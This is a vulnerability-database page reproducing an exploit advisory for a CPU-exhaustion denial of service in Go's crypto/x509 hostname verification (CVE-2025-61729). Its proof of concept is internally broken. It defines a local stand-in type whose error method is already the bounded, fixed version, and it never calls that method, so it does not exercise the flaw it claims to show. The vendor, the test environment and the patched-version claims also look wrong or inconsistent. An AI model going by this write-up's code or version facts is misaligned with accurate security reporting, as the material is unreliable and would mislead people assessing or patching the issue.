Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Go crypto/x509 Hostname Verification Denial of Service

🗓️ 04 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 157 Views

DoS in Go crypto/x509 hostname verification from certificates with DNSNames causing CPU exhaustion.

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins		Security Bulletin: IBM Watson Speech Services Cartridge is vulnerable to Improper Certificate Validation in crypto/x509 [CVE-2025-61729]
14 Apr 202616:58
ibm
IBM Security Bulletins		Security Bulletin: Multiple security vulnerabilities addressed with IBM Business Automation Workflow cumulative fixes April 2026
27 May 202615:10
ibm
IBM Security Bulletins		Security Bulletin: Certificate Name Constraints Bypass via Wildcard SANs affects watsonx.data
8 Apr 202610:48
ibm
IBM Security Bulletins		Security Bulletin: IBM App Connect Enterprise Certified Container operator and operands are vulnerable to loss of confidentiality (CVE-2025-61727) and denial of service (CVE-2025-61729)
5 Feb 202612:50
ibm
IBM Security Bulletins		Security Bulletin: Multiple vulnerabilities affect Data Virtualization on IBM Software Hub (February 2026)
27 Feb 202603:34
ibm
IBM Security Bulletins		Security Bulletin: Multiple vulnerabilities in IBM Planning Analytics
16 Mar 202621:53
ibm
IBM Security Bulletins		Security Bulletin: IBM Guardium Data Protection is affected by multiple vulnerabilities
20 May 202615:34
ibm
IBM Security Bulletins		Security Bulletin: Multiple secuirty vulnerabilies addressed with IBM Business Automation Workflow containers January 2026
30 Jan 202617:17
ibm
IBM Security Bulletins		Security Bulletin: Vulnerability in crypto/x509 affects IBM Netezza Appliance
16 Jan 202609:29
ibm
IBM Security Bulletins		Security Bulletin: ELM on Hybrid Cloud vulnerabilities addressed in 2.0.0
20 Apr 202609:57
ibm
Rows per page
=============================================================================================================================================
    | # Title     : Go crypto/x509 Hostname Verification Denial of Service                                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.gocrypto.com/                                                                                                   |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/214685/ & CVE-2025-61729
    
    [+] Summary    : A denial of service vulnerability exists in the Go programming language crypto/x509 package. The issue occurs during TLS hostname verification
                     when constructing error messages for certificates containing a very large number of DNS names.
                     In affected versions, error message construction uses repeated string concatenation without bounds, resulting in quadratic time complexity
                     (O(n²)). An attacker can exploit this by presenting a malicious TLS certificate containing an excessive number of DNSNames, causing severe CPU and memory exhaustion.
    				 
    [+] Affected Versions : All Go versions prior to the official fixes are affected.
    
    The following versions are NOT vulnerable:
    
    - Go 1.23.1
    - Go 1.22.10
    - Any Go release containing the official patch
    
    [+] Technical Details : When hostname verification fails, the crypto/x509 package constructs a human-readable error string listing all DNS names present in the TLS certificate.
    
    [+] In vulnerable versions:
    
    - No upper bound is enforced on the number of DNS names processed
    - String concatenation is performed using repeated "+=" operations
    - This leads to quadratic time complexity and excessive memory usage
    
    An attacker-controlled certificate with tens or hundreds of thousandsof DNS names can trigger resource exhaustion during error generation.
    
    
    [+] PoC : The following PoC demonstrates the vulnerable condition by creating a certificate-like structure with 100,000 DNS names and triggering the
              error handling logic. The Error() method is intentionally not invoked to prevent system freeze on vulnerable environments.
    
    File: hostname_error.go
    -----------------------
    package main
    
    import (
        "fmt"
        "strings"
    )
    
    type HostnameError struct {
        Certificate *Certificate
        Host        string
    }
    
    type Certificate struct {
        DNSNames []string
    }
    
    func (h HostnameError) Error() string {
        const maxNames = 10
    
        var builder strings.Builder
        names := h.Certificate.DNSNames
    
        builder.WriteString("certificate is valid for ")
    
        displayCount := len(names)
        if displayCount > maxNames {
            displayCount = maxNames
        }
    
        for i := 0; i < displayCount; i++ {
            if i > 0 {
                builder.WriteString(", ")
            }
            builder.WriteString(names[i])
        }
    
        if len(names) > maxNames {
            builder.WriteString(
                fmt.Sprintf(", and %d more", len(names)-maxNames),
            )
        }
    
        builder.WriteString(fmt.Sprintf(", not for %s", h.Host))
        return builder.String()
    }
    -------------
    File: poc.go
    -------------
    package main
    
    import "fmt"
    
    func main() {
        cert := &Certificate{
            DNSNames: make([]string, 100000),
        }
    
        for i := range cert.DNSNames {
            cert.DNSNames[i] = fmt.Sprintf("host%d.example.com", i)
        }
    
        err := HostnameError{
            Certificate: cert,
            Host:        "example.com",
        }
    
        fmt.Println("[+] HostnameError object created")
        fmt.Printf("[+] DNSNames count: %d\n", len(cert.DNSNames))
    
        // WARNING:
        // Calling err.Error() on a vulnerable Go version
        // may cause severe CPU and memory exhaustion.
        _ = err
    }
    
    [+] How to Run
    
    1. Save the files as:
       - hostname_error.go
       - poc.go
    
    2. Run the PoC:
       $ go run .
    
    Greetings to :============================================================
    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
    ==========================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.17.5
EPSS0.00019
SSVC
go languagecertificate verificationhostname verificationdomain namesdenial of service
157